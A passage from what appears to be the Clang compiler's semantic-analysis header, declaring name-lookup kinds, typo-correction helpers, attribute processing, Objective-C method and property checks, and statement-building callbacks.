bool CheckParmsForFunctionDef(ArrayRef<ParmVarDecl *> Parameters,
bool CheckParameterNames);
void CheckCXXDefaultArguments(FunctionDecl *FD);
void CheckExtraCXXDefaultArguments(Declarator &D);
Scope *getNonFieldDeclScope(Scope *S);
/// \name Name lookup
///
/// These routines provide name lookup that is used during semantic
/// analysis to resolve the various kinds of names (identifiers,
/// overloaded operator names, constructor names, etc.) into zero or
/// more declarations within a particular scope. The major entry
/// points are LookupName, which performs unqualified name lookup,
/// and LookupQualifiedName, which performs qualified name lookup.
///
/// All name lookup is performed based on some specific criteria,
/// which specify what names will be visible to name lookup and how
/// far name lookup should work. These criteria are important both
/// for capturing language semantics (certain lookups will ignore
/// certain names, for example) and for performance, since name
/// lookup is often a bottleneck in the compilation of C++. Name
/// lookup criteria is specified via the LookupCriteria enumeration.
///
/// The results of name lookup can vary based on the kind of name
/// lookup performed, the current language, and the translation
/// unit. In C, for example, name lookup will either return nothing
/// (no entity found) or a single declaration. In C++, name lookup
/// can additionally refer to a set of overloaded functions or
/// result in an ambiguity. All of the possible results of name
/// lookup are captured by the LookupResult class, which provides
/// the ability to distinguish among them.
//@{
/// Describes the kind of name lookup to perform.
enum LookupNameKind {
/// Ordinary name lookup, which finds ordinary names (functions,
/// variables, typedefs, etc.) in C and most kinds of names
/// (functions, variables, members, types, etc.) in C++.
LookupOrdinaryName = 0,
/// Tag name lookup, which finds the names of enums, classes,
/// structs, and unions.
LookupTagName,
/// Label name lookup.
LookupLabel,
/// Member name lookup, which finds the names of
/// class/struct/union members.
LookupMemberName,
/// Look up of an operator name (e.g., operator+) for use with
/// operator overloading. This lookup is similar to ordinary name
/// lookup, but will ignore any declarations that are class members.
LookupOperatorName,
/// Look up a name following ~ in a destructor name. This is an ordinary
/// lookup, but prefers tags to typedefs.
LookupDestructorName,
/// Look up of a name that precedes the '::' scope resolution
/// operator in C++. This lookup completely ignores operator, object,
/// function, and enumerator names (C++ [basic.lookup.qual]p1).
LookupNestedNameSpecifierName,
/// Look up a namespace name within a C++ using directive or
/// namespace alias definition, ignoring non-namespace names (C++
/// [basic.lookup.udir]p1).
LookupNamespaceName,
/// Look up all declarations in a scope with the given name,
/// including resolved using declarations. This is appropriate
/// for checking redeclarations for a using declaration.
LookupUsingDeclName,
/// Look up an ordinary name that is going to be redeclared as a
/// name with linkage. This lookup ignores any declarations that
/// are outside of the current scope unless they have linkage. See
/// C99 6.2.2p4-5 and C++ [basic.link]p6.
LookupRedeclarationWithLinkage,
/// Look up a friend of a local class. This lookup does not look
/// outside the innermost non-class scope. See C++11 [class.friend]p11.
LookupLocalFriendName,
/// Look up the name of an Objective-C protocol.
LookupObjCProtocolName,
/// Look up implicit 'self' parameter of an objective-c method.
LookupObjCImplicitSelfParam,
/// Look up the name of an OpenMP user-defined reduction operation.
LookupOMPReductionName,
/// Look up the name of an OpenMP user-defined mapper.
LookupOMPMapperName,
/// Look up any declaration with any name.
LookupAnyName
};
/// Specifies whether (or how) name lookup is being performed for a
/// redeclaration (vs. a reference).
enum RedeclarationKind {
/// The lookup is a reference to this name that is not for the
/// purpose of redeclaring the name.
NotForRedeclaration = 0,
/// The lookup results will be used for redeclaration of a name,
/// if an entity by that name already exists and is visible.
ForVisibleRedeclaration,
/// The lookup results will be used for redeclaration of a name
/// with external linkage; non-visible lookup results with external linkage
/// may also be found.
ForExternalRedeclaration
};
RedeclarationKind forRedeclarationInCurContext() {
// A declaration with an owning module for linkage can never link against
// anything that is not visible. We don't need to check linkage here; if
// the context has internal linkage, redeclaration lookup won't find things
// from other TUs, and we can't safely compute linkage yet in general.
if (cast<Decl>(CurContext)
->getOwningModuleForLinkage(/*IgnoreLinkage*/true))
return ForVisibleRedeclaration;
return ForExternalRedeclaration;
}
/// The possible outcomes of name lookup for a literal operator.
enum LiteralOperatorLookupResult {
/// The lookup resulted in an error.
LOLR_Error,
/// The lookup found no match but no diagnostic was issued.
LOLR_ErrorNoDiagnostic,
/// The lookup found a single 'cooked' literal operator, which
/// expects a normal literal to be built and passed to it.
LOLR_Cooked,
/// The lookup found a single 'raw' literal operator, which expects
/// a string literal containing the spelling of the literal token.
LOLR_Raw,
/// The lookup found an overload set of literal operator templates,
/// which expect the characters of the spelling of the literal token to be
/// passed as a non-type template argument pack.
LOLR_Template,
/// The lookup found an overload set of literal operator templates,
/// which expect the character type and characters of the spelling of the
/// string literal token to be passed as template arguments.
LOLR_StringTemplate
};
SpecialMemberOverloadResult LookupSpecialMember(CXXRecordDecl *D,
CXXSpecialMember SM,
bool ConstArg,
bool VolatileArg,
bool RValueThis,
bool ConstThis,
bool VolatileThis);
typedef std::function<void(const TypoCorrection &)> TypoDiagnosticGenerator;
typedef std::function<ExprResult(Sema &, TypoExpr *, TypoCorrection)>
TypoRecoveryCallback;
private:
bool CppLookupName(LookupResult &R, Scope *S);
struct TypoExprState {
std::unique_ptr<TypoCorrectionConsumer> Consumer;
TypoDiagnosticGenerator DiagHandler;
TypoRecoveryCallback RecoveryHandler;
TypoExprState();
TypoExprState(TypoExprState &&other) noexcept;
TypoExprState &operator=(TypoExprState &&other) noexcept;
};
/// The set of unhandled TypoExprs and their associated state.
llvm::MapVector<TypoExpr *, TypoExprState> DelayedTypos;
/// Creates a new TypoExpr AST node.
TypoExpr *createDelayedTypo(std::unique_ptr<TypoCorrectionConsumer> TCC,
TypoDiagnosticGenerator TDG,
TypoRecoveryCallback TRC);
// The set of known/encountered (unique, canonicalized) NamespaceDecls.
//
// The boolean value will be true to indicate that the namespace was loaded
// from an AST/PCH file, or false otherwise.
llvm::MapVector<NamespaceDecl*, bool> KnownNamespaces;
/// Whether we have already loaded known namespaces from an extenal
/// source.
bool LoadedExternalKnownNamespaces;
/// Helper for CorrectTypo and CorrectTypoDelayed used to create and
/// populate a new TypoCorrectionConsumer. Returns nullptr if typo correction
/// should be skipped entirely.
std::unique_ptr<TypoCorrectionConsumer>
makeTypoCorrectionConsumer(const DeclarationNameInfo &Typo,
Sema::LookupNameKind LookupKind, Scope *S,
CXXScopeSpec *SS,
CorrectionCandidateCallback &CCC,
DeclContext *MemberContext, bool EnteringContext,
const ObjCObjectPointerType *OPT,
bool ErrorRecovery);
public:
const TypoExprState &getTypoExprState(TypoExpr *TE) const;
/// Clears the state of the given TypoExpr.
void clearDelayedTypo(TypoExpr *TE);
/// Look up a name, looking for a single declaration. Return
/// null if the results were absent, ambiguous, or overloaded.
///
/// It is preferable to use the elaborated form and explicitly handle
/// ambiguity and overloaded.
NamedDecl *LookupSingleName(Scope *S, DeclarationName Name,
SourceLocation Loc,
LookupNameKind NameKind,
RedeclarationKind Redecl
= NotForRedeclaration);
bool LookupBuiltin(LookupResult &R);
bool LookupName(LookupResult &R, Scope *S,
bool AllowBuiltinCreation = false);
bool LookupQualifiedName(LookupResult &R, DeclContext *LookupCtx,
bool InUnqualifiedLookup = false);
bool LookupQualifiedName(LookupResult &R, DeclContext *LookupCtx,
CXXScopeSpec &SS);
bool LookupParsedName(LookupResult &R, Scope *S, CXXScopeSpec *SS,
bool AllowBuiltinCreation = false,
bool EnteringContext = false);
ObjCProtocolDecl *LookupProtocol(IdentifierInfo *II, SourceLocation IdLoc,
RedeclarationKind Redecl
= NotForRedeclaration);
bool LookupInSuper(LookupResult &R, CXXRecordDecl *Class);
void LookupOverloadedOperatorName(OverloadedOperatorKind Op, Scope *S,
QualType T1, QualType T2,
UnresolvedSetImpl &Functions);
LabelDecl *LookupOrCreateLabel(IdentifierInfo *II, SourceLocation IdentLoc,
SourceLocation GnuLabelLoc = SourceLocation());
DeclContextLookupResult LookupConstructors(CXXRecordDecl *Class);
CXXConstructorDecl *LookupDefaultConstructor(CXXRecordDecl *Class);
CXXConstructorDecl *LookupCopyingConstructor(CXXRecordDecl *Class,
unsigned Quals);
CXXMethodDecl *LookupCopyingAssignment(CXXRecordDecl *Class, unsigned Quals,
bool RValueThis, unsigned ThisQuals);
CXXConstructorDecl *LookupMovingConstructor(CXXRecordDecl *Class,
unsigned Quals);
CXXMethodDecl *LookupMovingAssignment(CXXRecordDecl *Class, unsigned Quals,
bool RValueThis, unsigned ThisQuals);
CXXDestructorDecl *LookupDestructor(CXXRecordDecl *Class);
bool checkLiteralOperatorId(const CXXScopeSpec &SS, const UnqualifiedId &Id);
LiteralOperatorLookupResult LookupLiteralOperator(Scope *S, LookupResult &R,
ArrayRef<QualType> ArgTys,
bool AllowRaw,
bool AllowTemplate,
bool AllowStringTemplate,
bool DiagnoseMissing);
bool isKnownName(StringRef name);
/// Status of the function emission on the CUDA/HIP/OpenMP host/device attrs.
enum class FunctionEmissionStatus {
Emitted,
CUDADiscarded, // Discarded due to CUDA/HIP hostness
OMPDiscarded, // Discarded due to OpenMP hostness
TemplateDiscarded, // Discarded due to uninstantiated templates
Unknown,
};
FunctionEmissionStatus getEmissionStatus(FunctionDecl *Decl,
bool Final = false);
// Whether the callee should be ignored in CUDA/HIP/OpenMP host/device check.
bool shouldIgnoreInHostDeviceCheck(FunctionDecl *Callee);
void ArgumentDependentLookup(DeclarationName Name, SourceLocation Loc,
ArrayRef<Expr *> Args, ADLResult &Functions);
void LookupVisibleDecls(Scope *S, LookupNameKind Kind,
VisibleDeclConsumer &Consumer,
bool IncludeGlobalScope = true,
bool LoadExternal = true);
void LookupVisibleDecls(DeclContext *Ctx, LookupNameKind Kind,
VisibleDeclConsumer &Consumer,
bool IncludeGlobalScope = true,
bool IncludeDependentBases = false,
bool LoadExternal = true);
enum CorrectTypoKind {
CTK_NonError, // CorrectTypo used in a non error recovery situation.
CTK_ErrorRecovery // CorrectTypo used in normal error recovery.
};
TypoCorrection CorrectTypo(const DeclarationNameInfo &Typo,
Sema::LookupNameKind LookupKind,
Scope *S, CXXScopeSpec *SS,
CorrectionCandidateCallback &CCC,
CorrectTypoKind Mode,
DeclContext *MemberContext = nullptr,
bool EnteringContext = false,
const ObjCObjectPointerType *OPT = nullptr,
bool RecordFailure = true);
TypoExpr *CorrectTypoDelayed(const DeclarationNameInfo &Typo,
Sema::LookupNameKind LookupKind, Scope *S,
CXXScopeSpec *SS,
CorrectionCandidateCallback &CCC,
TypoDiagnosticGenerator TDG,
TypoRecoveryCallback TRC, CorrectTypoKind Mode,
DeclContext *MemberContext = nullptr,
bool EnteringContext = false,
const ObjCObjectPointerType *OPT = nullptr);
/// Process any TypoExprs in the given Expr and its children,
/// generating diagnostics as appropriate and returning a new Expr if there
/// were typos that were all successfully corrected and ExprError if one or
/// more typos could not be corrected.
///
/// \param E The Expr to check for TypoExprs.
///
/// \param InitDecl A VarDecl to avoid because the Expr being corrected is its
/// initializer.
///
/// \param Filter A function applied to a newly rebuilt Expr to determine if
/// it is an acceptable/usable result from a single combination of typo
/// corrections. As long as the filter returns ExprError, different
/// combinations of corrections will be tried until all are exhausted.
ExprResult
CorrectDelayedTyposInExpr(Expr *E, VarDecl *InitDecl = nullptr,
llvm::function_ref<ExprResult(Expr *)> Filter =
[](Expr *E) -> ExprResult { return E; });
ExprResult
CorrectDelayedTyposInExpr(Expr *E,
llvm::function_ref<ExprResult(Expr *)> Filter) {
return CorrectDelayedTyposInExpr(E, nullptr, Filter);
}
ExprResult
CorrectDelayedTyposInExpr(ExprResult ER, VarDecl *InitDecl = nullptr,
llvm::function_ref<ExprResult(Expr *)> Filter =
[](Expr *E) -> ExprResult { return E; }) {
return ER.isInvalid() ? ER : CorrectDelayedTyposInExpr(ER.get(), Filter);
}
ExprResult
CorrectDelayedTyposInExpr(ExprResult ER,
llvm::function_ref<ExprResult(Expr *)> Filter) {
return CorrectDelayedTyposInExpr(ER, nullptr, Filter);
}
void diagnoseTypo(const TypoCorrection &Correction,
const PartialDiagnostic &TypoDiag,
bool ErrorRecovery = true);
void diagnoseTypo(const TypoCorrection &Correction,
const PartialDiagnostic &TypoDiag,
const PartialDiagnostic &PrevNote,
bool ErrorRecovery = true);
void MarkTypoCorrectedFunctionDefinition(const NamedDecl *F);
void FindAssociatedClassesAndNamespaces(SourceLocation InstantiationLoc,
ArrayRef<Expr *> Args,
AssociatedNamespaceSet &AssociatedNamespaces,
AssociatedClassSet &AssociatedClasses);
void FilterLookupForScope(LookupResult &R, DeclContext *Ctx, Scope *S,
bool ConsiderLinkage, bool AllowInlineNamespace);
bool CheckRedeclarationModuleOwnership(NamedDecl *New, NamedDecl *Old);
void DiagnoseAmbiguousLookup(LookupResult &Result);
//@}
/// Attempts to produce a RecoveryExpr after some AST node cannot be created.
ExprResult CreateRecoveryExpr(SourceLocation Begin, SourceLocation End,
ArrayRef<Expr *> SubExprs,
QualType T = QualType());
ObjCInterfaceDecl *getObjCInterfaceDecl(IdentifierInfo *&Id,
SourceLocation IdLoc,
bool TypoCorrection = false);
NamedDecl *LazilyCreateBuiltin(IdentifierInfo *II, unsigned ID,
Scope *S, bool ForRedeclaration,
SourceLocation Loc);
NamedDecl *ImplicitlyDefineFunction(SourceLocation Loc, IdentifierInfo &II,
Scope *S);
void AddKnownFunctionAttributesForReplaceableGlobalAllocationFunction(
FunctionDecl *FD);
void AddKnownFunctionAttributes(FunctionDecl *FD);
// More parsing and symbol table subroutines.
void ProcessPragmaWeak(Scope *S, Decl *D);
// Decl attributes - this routine is the top level dispatcher.
void ProcessDeclAttributes(Scope *S, Decl *D, const Declarator &PD);
// Helper for delayed processing of attributes.
void ProcessDeclAttributeDelayed(Decl *D,
const ParsedAttributesView &AttrList);
void ProcessDeclAttributeList(Scope *S, Decl *D, const ParsedAttributesView &AL,
bool IncludeCXX11Attributes = true);
bool ProcessAccessDeclAttributeList(AccessSpecDecl *ASDecl,
const ParsedAttributesView &AttrList);
void checkUnusedDeclAttributes(Declarator &D);
/// Map any API notes provided for this declaration to attributes on the
/// declaration.
///
/// Triggered by declaration-attribute processing.
void ProcessAPINotes(Decl *D);
/// Determine if type T is a valid subject for a nonnull and similar
/// attributes. By default, we look through references (the behavior used by
/// nonnull), but if the second parameter is true, then we treat a reference
/// type as valid.
bool isValidPointerAttrType(QualType T, bool RefOkay = false);
bool CheckRegparmAttr(const ParsedAttr &attr, unsigned &value);
bool CheckCallingConvAttr(const ParsedAttr &attr, CallingConv &CC,
const FunctionDecl *FD = nullptr);
bool CheckAttrTarget(const ParsedAttr &CurrAttr);
bool CheckAttrNoArgs(const ParsedAttr &CurrAttr);
bool checkStringLiteralArgumentAttr(const ParsedAttr &Attr, unsigned ArgNum,
StringRef &Str,
SourceLocation *ArgLocation = nullptr);
bool checkSectionName(SourceLocation LiteralLoc, StringRef Str);
bool checkTargetAttr(SourceLocation LiteralLoc, StringRef Str);
bool checkMSInheritanceAttrOnDefinition(
CXXRecordDecl *RD, SourceRange Range, bool BestCase,
MSInheritanceModel SemanticSpelling);
void CheckAlignasUnderalignment(Decl *D);
/// Adjust the calling convention of a method to be the ABI default if it
/// wasn't specified explicitly. This handles method types formed from
/// function type typedefs and typename template arguments.
void adjustMemberFunctionCC(QualType &T, bool IsStatic, bool IsCtorOrDtor,
SourceLocation Loc);
// Check if there is an explicit attribute, but only look through parens.
// The intent is to look for an attribute on the current declarator, but not
// one that came from a typedef.
bool hasExplicitCallingConv(QualType T);
/// Get the outermost AttributedType node that sets a calling convention.
/// Valid types should not have multiple attributes with different CCs.
const AttributedType *getCallingConvAttributedType(QualType T) const;
/// Check whether a nullability type specifier can be added to the given
/// type through some means not written in source (e.g. API notes).
///
/// \param type The type to which the nullability specifier will be
/// added. On success, this type will be updated appropriately.
///
/// \param nullability The nullability specifier to add.
///
/// \param diagLoc The location to use for diagnostics.
///
/// \param allowArrayTypes Whether to accept nullability specifiers on an
/// array type (e.g., because it will decay to a pointer).
///
/// \param overrideExisting Whether to override an existing, locally-specified
/// nullability specifier rather than complaining about the conflict.
///
/// \returns true if nullability cannot be applied, false otherwise.
bool checkImplicitNullabilityTypeSpecifier(QualType &type,
NullabilityKind nullability,
SourceLocation diagLoc,
bool allowArrayTypes,
bool overrideExisting);
/// Stmt attributes - this routine is the top level dispatcher.
StmtResult ProcessStmtAttributes(Stmt *Stmt,
const ParsedAttributesView &Attrs,
SourceRange Range);
void WarnConflictingTypedMethods(ObjCMethodDecl *Method,
ObjCMethodDecl *MethodDecl,
bool IsProtocolMethodDecl);
void CheckConflictingOverridingMethod(ObjCMethodDecl *Method,
ObjCMethodDecl *Overridden,
bool IsProtocolMethodDecl);
/// WarnExactTypedMethods - This routine issues a warning if method
/// implementation declaration matches exactly that of its declaration.
void WarnExactTypedMethods(ObjCMethodDecl *Method,
ObjCMethodDecl *MethodDecl,
bool IsProtocolMethodDecl);
typedef llvm::SmallPtrSet<Selector, 8> SelectorSet;
/// CheckImplementationIvars - This routine checks if the instance variables
/// listed in the implelementation match those listed in the interface.
void CheckImplementationIvars(ObjCImplementationDecl *ImpDecl,
ObjCIvarDecl **Fields, unsigned nIvars,
SourceLocation Loc);
/// ImplMethodsVsClassMethods - This is main routine to warn if any method
/// remains unimplemented in the class or category \@implementation.
void ImplMethodsVsClassMethods(Scope *S, ObjCImplDecl* IMPDecl,
ObjCContainerDecl* IDecl,
bool IncompleteImpl = false);
/// DiagnoseUnimplementedProperties - This routine warns on those properties
/// which must be implemented by this implementation.
void DiagnoseUnimplementedProperties(Scope *S, ObjCImplDecl* IMPDecl,
ObjCContainerDecl *CDecl,
bool SynthesizeProperties);
/// Diagnose any null-resettable synthesized setters.
void diagnoseNullResettableSynthesizedSetters(const ObjCImplDecl *impDecl);
/// DefaultSynthesizeProperties - This routine default synthesizes all
/// properties which must be synthesized in the class's \@implementation.
void DefaultSynthesizeProperties(Scope *S, ObjCImplDecl *IMPDecl,
ObjCInterfaceDecl *IDecl,
SourceLocation AtEnd);
void DefaultSynthesizeProperties(Scope *S, Decl *D, SourceLocation AtEnd);
/// IvarBacksCurrentMethodAccessor - This routine returns 'true' if 'IV' is
/// an ivar synthesized for 'Method' and 'Method' is a property accessor
/// declared in class 'IFace'.
bool IvarBacksCurrentMethodAccessor(ObjCInterfaceDecl *IFace,
ObjCMethodDecl *Method, ObjCIvarDecl *IV);
/// DiagnoseUnusedBackingIvarInAccessor - Issue an 'unused' warning if ivar which
/// backs the property is not used in the property's accessor.
void DiagnoseUnusedBackingIvarInAccessor(Scope *S,
const ObjCImplementationDecl *ImplD);
/// GetIvarBackingPropertyAccessor - If method is a property setter/getter and
/// it property has a backing ivar, returns this ivar; otherwise, returns NULL.
/// It also returns ivar's property on success.
ObjCIvarDecl *GetIvarBackingPropertyAccessor(const ObjCMethodDecl *Method,
const ObjCPropertyDecl *&PDecl) const;
/// Called by ActOnProperty to handle \@property declarations in
/// class extensions.
ObjCPropertyDecl *HandlePropertyInClassExtension(Scope *S,
SourceLocation AtLoc,
SourceLocation LParenLoc,
FieldDeclarator &FD,
Selector GetterSel,
SourceLocation GetterNameLoc,
Selector SetterSel,
SourceLocation SetterNameLoc,
const bool isReadWrite,
unsigned &Attributes,
const unsigned AttributesAsWritten,
QualType T,
TypeSourceInfo *TSI,
tok::ObjCKeywordKind MethodImplKind);
/// Called by ActOnProperty and HandlePropertyInClassExtension to
/// handle creating the ObjcPropertyDecl for a category or \@interface.
ObjCPropertyDecl *CreatePropertyDecl(Scope *S,
ObjCContainerDecl *CDecl,
SourceLocation AtLoc,
SourceLocation LParenLoc,
FieldDeclarator &FD,
Selector GetterSel,
SourceLocation GetterNameLoc,
Selector SetterSel,
SourceLocation SetterNameLoc,
const bool isReadWrite,
const unsigned Attributes,
const unsigned AttributesAsWritten,
QualType T,
TypeSourceInfo *TSI,
tok::ObjCKeywordKind MethodImplKind,
DeclContext *lexicalDC = nullptr);
/// AtomicPropertySetterGetterRules - This routine enforces the rule (via
/// warning) when atomic property has one but not the other user-declared
/// setter or getter.
void AtomicPropertySetterGetterRules(ObjCImplDecl* IMPDecl,
ObjCInterfaceDecl* IDecl);
void DiagnoseOwningPropertyGetterSynthesis(const ObjCImplementationDecl *D);
void DiagnoseMissingDesignatedInitOverrides(
const ObjCImplementationDecl *ImplD,
const ObjCInterfaceDecl *IFD);
void DiagnoseDuplicateIvars(ObjCInterfaceDecl *ID, ObjCInterfaceDecl *SID);
enum MethodMatchStrategy {
MMS_loose,
MMS_strict
};
/// MatchTwoMethodDeclarations - Checks if two methods' type match and returns
/// true, or false, accordingly.
bool MatchTwoMethodDeclarations(const ObjCMethodDecl *Method,
const ObjCMethodDecl *PrevMethod,
MethodMatchStrategy strategy = MMS_strict);
/// MatchAllMethodDeclarations - Check methods declaraed in interface or
/// or protocol against those declared in their implementations.
void MatchAllMethodDeclarations(const SelectorSet &InsMap,
const SelectorSet &ClsMap,
SelectorSet &InsMapSeen,
SelectorSet &ClsMapSeen,
ObjCImplDecl* IMPDecl,
ObjCContainerDecl* IDecl,
bool &IncompleteImpl,
bool ImmediateClass,
bool WarnCategoryMethodImpl=false);
/// CheckCategoryVsClassMethodMatches - Checks that methods implemented in
/// category matches with those implemented in its primary class and
/// warns each time an exact match is found.
void CheckCategoryVsClassMethodMatches(ObjCCategoryImplDecl *CatIMP);
/// Add the given method to the list of globally-known methods.
void addMethodToGlobalList(ObjCMethodList *List, ObjCMethodDecl *Method);
/// Returns default addr space for method qualifiers.
LangAS getDefaultCXXMethodAddrSpace() const;
private:
/// AddMethodToGlobalPool - Add an instance or factory method to the global
/// pool. See descriptoin of AddInstanceMethodToGlobalPool.
void AddMethodToGlobalPool(ObjCMethodDecl *Method, bool impl, bool instance);
/// LookupMethodInGlobalPool - Returns the instance or factory method and
/// optionally warns if there are multiple signatures.
ObjCMethodDecl *LookupMethodInGlobalPool(Selector Sel, SourceRange R,
bool receiverIdOrClass,
bool instance);
public:
/// - Returns instance or factory methods in global method pool for
/// given selector. It checks the desired kind first, if none is found, and
/// parameter checkTheOther is set, it then checks the other kind. If no such
/// method or only one method is found, function returns false; otherwise, it
/// returns true.
bool
CollectMultipleMethodsInGlobalPool(Selector Sel,
SmallVectorImpl<ObjCMethodDecl*>& Methods,
bool InstanceFirst, bool CheckTheOther,
const ObjCObjectType *TypeBound = nullptr);
bool
AreMultipleMethodsInGlobalPool(Selector Sel, ObjCMethodDecl *BestMethod,
SourceRange R, bool receiverIdOrClass,
SmallVectorImpl<ObjCMethodDecl*>& Methods);
void
DiagnoseMultipleMethodInGlobalPool(SmallVectorImpl<ObjCMethodDecl*> &Methods,
Selector Sel, SourceRange R,
bool receiverIdOrClass);
private:
/// - Returns a selector which best matches given argument list or
/// nullptr if none could be found
ObjCMethodDecl *SelectBestMethod(Selector Sel, MultiExprArg Args,
bool IsInstance,
SmallVectorImpl<ObjCMethodDecl*>& Methods);
/// Record the typo correction failure and return an empty correction.
TypoCorrection FailedCorrection(IdentifierInfo *Typo, SourceLocation TypoLoc,
bool RecordFailure = true) {
if (RecordFailure)
TypoCorrectionFailures[Typo].insert(TypoLoc);
return TypoCorrection();
}
public:
/// AddInstanceMethodToGlobalPool - All instance methods in a translation
/// unit are added to a global pool. This allows us to efficiently associate
/// a selector with a method declaraation for purposes of typechecking
/// messages sent to "id" (where the class of the object is unknown).
void AddInstanceMethodToGlobalPool(ObjCMethodDecl *Method, bool impl=false) {
AddMethodToGlobalPool(Method, impl, /*instance*/true);
}
/// AddFactoryMethodToGlobalPool - Same as above, but for factory methods.
void AddFactoryMethodToGlobalPool(ObjCMethodDecl *Method, bool impl=false) {
AddMethodToGlobalPool(Method, impl, /*instance*/false);
}
/// AddAnyMethodToGlobalPool - Add any method, instance or factory to global
/// pool.
void AddAnyMethodToGlobalPool(Decl *D);
/// LookupInstanceMethodInGlobalPool - Returns the method and warns if
/// there are multiple signatures.
ObjCMethodDecl *LookupInstanceMethodInGlobalPool(Selector Sel, SourceRange R,
bool receiverIdOrClass=false) {
return LookupMethodInGlobalPool(Sel, R, receiverIdOrClass,
/*instance*/true);
}
/// LookupFactoryMethodInGlobalPool - Returns the method and warns if
/// there are multiple signatures.
ObjCMethodDecl *LookupFactoryMethodInGlobalPool(Selector Sel, SourceRange R,
bool receiverIdOrClass=false) {
return LookupMethodInGlobalPool(Sel, R, receiverIdOrClass,
/*instance*/false);
}
const ObjCMethodDecl *SelectorsForTypoCorrection(Selector Sel,
QualType ObjectType=QualType());
/// LookupImplementedMethodInGlobalPool - Returns the method which has an
/// implementation.
ObjCMethodDecl *LookupImplementedMethodInGlobalPool(Selector Sel);
/// CollectIvarsToConstructOrDestruct - Collect those ivars which require
/// initialization.
void CollectIvarsToConstructOrDestruct(ObjCInterfaceDecl *OI,
SmallVectorImpl<ObjCIvarDecl*> &Ivars);
//===--------------------------------------------------------------------===//
// Statement Parsing Callbacks: SemaStmt.cpp.
public:
class FullExprArg {
public:
FullExprArg() : E(nullptr) { }
FullExprArg(Sema &actions) : E(nullptr) { }
ExprResult release() {
return E;
}
Expr *get() const { return E; }
Expr *operator->() {
return E;
}
private:
// FIXME: No need to make the entire Sema class a friend when it's just
// Sema::MakeFullExpr that needs access to the constructor below.
friend class Sema;
explicit FullExprArg(Expr *expr) : E(expr) {}
Expr *E;
};
FullExprArg MakeFullExpr(Expr *Arg) {
return MakeFullExpr(Arg, Arg ? Arg->getExprLoc() : SourceLocation());
}
FullExprArg MakeFullExpr(Expr *Arg, SourceLocation CC) {
return FullExprArg(
ActOnFinishFullExpr(Arg, CC, /*DiscardedValue*/ false).get());
}
FullExprArg MakeFullDiscardedValueExpr(Expr *Arg) {
ExprResult FE =
ActOnFinishFullExpr(Arg, Arg ? Arg->getExprLoc() : SourceLocation(),
/*DiscardedValue*/ true);
return FullExprArg(FE.get());
}
StmtResult ActOnExprStmt(ExprResult Arg, bool DiscardedValue = true);
StmtResult ActOnExprStmtError();
StmtResult ActOnNullStmt(SourceLocation SemiLoc,
bool HasLeadingEmptyMacro = false);
void ActOnStartOfCompoundStmt(bool IsStmtExpr);
void ActOnFinishOfCompoundStmt();
StmtResult ActOnCompoundStmt(SourceLocation L, SourceLocation R,
ArrayRef<Stmt *> Elts, bool isStmtExpr);
/// A RAII object to enter scope of a compound statement.
class CompoundScopeRAII {
public:
CompoundScopeRAII(Sema &S, bool IsStmtExpr = false) : S(S) {
S.ActOnStartOfCompoundStmt(IsStmtExpr);
}
~CompoundScopeRAII() {
S.ActOnFinishOfCompoundStmt();
}
private:
Sema &S;
};
/// An RAII helper that pops function a function scope on exit.
struct FunctionScopeRAII {
Sema &S;
bool Active;
FunctionScopeRAII(Sema &S) : S(S), Active(true) {}
~FunctionScopeRAII() {
if (Active)
S.PopFunctionScopeInfo();
}
void disable() { Active = false; }
};
StmtResult ActOnDeclStmt(DeclGroupPtrTy Decl,
SourceLocation StartLoc,
SourceLocation EndLoc);
void ActOnForEachDeclStmt(DeclGroupPtrTy Decl);
StmtResult ActOnForEachLValueExpr(Expr *E);
ExprResult ActOnCaseExpr(SourceLocation CaseLoc, ExprResult Val);
StmtResult ActOnCaseStmt(SourceLocation CaseLoc, ExprResult LHS,
SourceLocation DotDotDotLoc, ExprResult RHS,
SourceLocation ColonLoc);
void ActOnCaseStmtBody(Stmt *CaseStmt, Stmt *SubStmt);
StmtResult ActOnDefaultStmt(SourceLocation DefaultLoc,
SourceLocation ColonLoc,
Stmt *SubStmt, Scope *CurScope);
StmtResult ActOnLabelStmt(SourceLocation IdentLoc, LabelDecl *TheDecl,
SourceLocation ColonLoc, Stmt *SubStmt);
StmtResult ActOnAttributedStmt(SourceLocation AttrLoc,
ArrayRef<const Attr*> Attrs,
Stmt *SubStmt);
class ConditionResult;
StmtResult ActOnIfStmt(SourceLocation IfLoc, bool IsConstexpr,
Stmt *InitStmt,
ConditionResult Cond, Stmt *ThenVal,
SourceLocation ElseLoc, Stmt *ElseVal);
StmtResult BuildIfStmt(SourceLocation IfLoc, bool IsConstexpr,
Stmt *InitStmt,
ConditionResult Cond, Stmt *ThenVal,
SourceLocation ElseLoc, Stmt *ElseVal);
StmtResult ActOnStartOfSwitchStmt(SourceLocation SwitchLoc,
Stmt *InitStmt,
ConditionResult Cond);
StmtResult ActOnFinishSwitchStmt(SourceLocation SwitchLoc,
Stmt *Switch, Stmt *Body);
StmtResult ActOnWhileStmt(SourceLocation WhileLoc, ConditionResult Cond,
Stmt *Body);
StmtResult ActOnDoStmt(SourceLocation DoLoc, Stmt *Body,
SourceLocation WhileLoc, SourceLocation CondLParen,
Expr *Cond, SourceLocation CondRParen);
StmtResult ActOnForStmt(SourceLocation ForLoc,
SourceLocation LParenLoc,
Stmt *First,
ConditionResult Second,
FullExprArg Third,
SourceLocation RParenLoc,
Stmt *Body);
ExprResult CheckObjCForCollectionOperand(SourceLocation forLoc,
Expr *collection);
StmtResult ActOnObjCForCollectionStmt(SourceLocation ForColLoc,
Stmt *First, Expr *collection,
SourceLocation RParenLoc);
StmtResult FinishObjCForCollectionStmt(Stmt *ForCollection, Stmt *Body);
enum BuildForRangeKind {
/// Initial building of a for-range statement.
BFRK_Build,
/// Instantiation or recovery rebuild of a for-range statement. Don't
/// attempt any typo-correction.
BFRK_Rebuild,
/// Determining whether a for-range statement could be built. Avoid any
/// unnecessary or irreversible actions.
BFRK_Check
};
StmtResult ActOnCXXForRangeStmt(Scope *S, SourceLocation ForLoc,
SourceLocation CoawaitLoc,
Stmt *InitStmt,
Stmt *LoopVar,
SourceLocation ColonLoc, Expr *Collection,
SourceLocation RParenLoc,
BuildForRangeKind Kind);
StmtResult BuildCXXForRangeStmt(SourceLocation ForLoc,
SourceLocation CoawaitLoc,
Stmt *InitStmt,
SourceLocation ColonLoc,
Stmt *RangeDecl, Stmt *Begin, Stmt *End,
Expr *Cond, Expr *Inc,
Stmt *LoopVarDecl,
SourceLocation RParenLoc,
BuildForRangeKind Kind);
StmtResult FinishCXXForRangeStmt(Stmt *ForRange, Stmt *Body);
